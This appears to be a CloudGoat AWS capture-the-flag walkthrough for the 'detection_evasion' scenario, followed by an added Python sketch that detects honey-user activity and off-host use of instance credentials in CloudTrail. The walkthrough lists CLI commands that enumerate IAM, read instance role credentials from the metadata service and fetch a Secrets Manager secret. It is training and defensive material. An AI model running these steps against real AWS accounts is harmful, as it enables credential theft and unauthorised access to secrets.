CloudGoat AWS CTF solution: Scenario 11 (detection_evasion)

Scenario 11: detection_evasion

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py config whitelist --auto
./cloudgoat.py create detection_evasion

Scenario Resources (High Level)

Scenario Start(s)

Scenario Goal(s)

Summary (TLDR setup below)

TLDR Setup

  1. Set up a temporary email address if desired.
  2. Deploy the CloudGoat scenario. You will need to enter your email address when prompted; it is then stored in the ‘config.yml’ file at the top level of the repo.
  3. Check your email address for SNS confirmation emails; there should be two. Confirm that you want to subscribe to the topics.
  4. Wait 30–60 minutes before working on the scenario. This is necessary because there is a lag between the time Terraform finishes deploying all resources and the time your CLI actions actually trigger the alerts that result in email notifications.

SPOILER ALERT: There are spoilers for the scenario below this point.

Exploitation Route

Walkthrough Overview — Easy Path

  1. Discovering honey users:
aws --profile user_1 sdb list-domains --region us-east-1
aws --profile user_2 sdb list-domains --region us-east-1
aws --profile user_3 sdb list-domains --region us-east-1
aws --profile cg4 --region us-east-1 sdb list-domains
aws --profile user_4 iam list-groups-for-user --user-name r_waterhouse
aws --profile user_4 iam list-group-policies --group-name cg-developers
aws --profile user_4 iam get-group-policy --group-name cg-developers --policy-name developer_policy
aws --profile user_4 --region us-east-1 ec2 describe-instances
aws --profile user_4 --region us-east-1  ssm start-session --target "i-0b90cd487675a2818"
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/detection_evasion_cgid2wolmzzgua_easy
enumerate-iam
aws --region us-east-1  secretsmanager list-secrets --profile ec2_role
aws --profile ec2_role --region us-east-1  secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:623845349649:secret:detection_evasion_cgid2wolmzzgua_easy_secret-0D0aJ8"
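
Seen from the defender's side, two things in this route leave a trace in CloudTrail: any call made as a honey user, and instance role credentials (read from the metadata service, then used through the `ec2_role` profile) showing up from an address that is not the instance. The sketch below is an added example, not part of the original walkthrough or of CloudGoat's own alerting. It assumes CloudTrail records already parsed into dicts, and every user name, role name, account ID, instance ID and IP address in it is constructed.

```python
import ipaddress
import re

# All values below are constructed for illustration (not taken from the walkthrough).
HONEY_USERS = {"honey_user_a", "honey_user_b"}  # IAM users nobody should ever use
INSTANCE_IPS = {"i-0123456789abcdef0": {"10.0.1.25", "203.0.113.10"}}  # known egress IPs

# Instance-profile sessions are named after the instance ID.
SESSION_ARN = re.compile(r"^arn:aws:sts::\d{12}:assumed-role/([^/]+)/(i-[0-9a-f]+)$")

def classify(event):
    """Return findings for one CloudTrail record (already parsed into a dict)."""
    findings = []
    ident = event.get("userIdentity", {})
    src = event.get("sourceIPAddress", "")
    name = event.get("eventName", "?")
    if ident.get("type") == "IAMUser" and ident.get("userName") in HONEY_USERS:
        findings.append(("honey-user", ident["userName"], name, src))
    match = SESSION_ARN.match(ident.get("arn", ""))
    if ident.get("type") == "AssumedRole" and match:
        role, instance = match.groups()
        try:
            ipaddress.ip_address(src)
        except ValueError:
            return findings  # AWS service DNS name, not a caller IP
        # Unknown instances have no allowed IPs, so they are flagged too.
        if src not in INSTANCE_IPS.get(instance, set()):
            findings.append(("instance-creds-off-host", f"{role}/{instance}", name, src))
    return findings

def _role_event(src, name="GetSecretValue"):
    arn = "arn:aws:sts::111122223333:assumed-role/example_instance_role/i-0123456789abcdef0"
    return {"eventName": name, "sourceIPAddress": src,
            "userIdentity": {"type": "AssumedRole", "arn": arn}}

SAMPLE_EVENTS = [
    {"eventName": "GetCallerIdentity", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "honey_user_a"}},
    {"eventName": "DescribeInstances", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "userName": "developer_1"}},
    _role_event("203.0.113.10"),                          # call made from the instance
    _role_event("secretsmanager.amazonaws.com", "Decrypt"),  # service acting for the caller
    _role_event("198.51.100.7"),                          # same credentials, used elsewhere
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for finding in classify(ev):
            print(finding)
```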
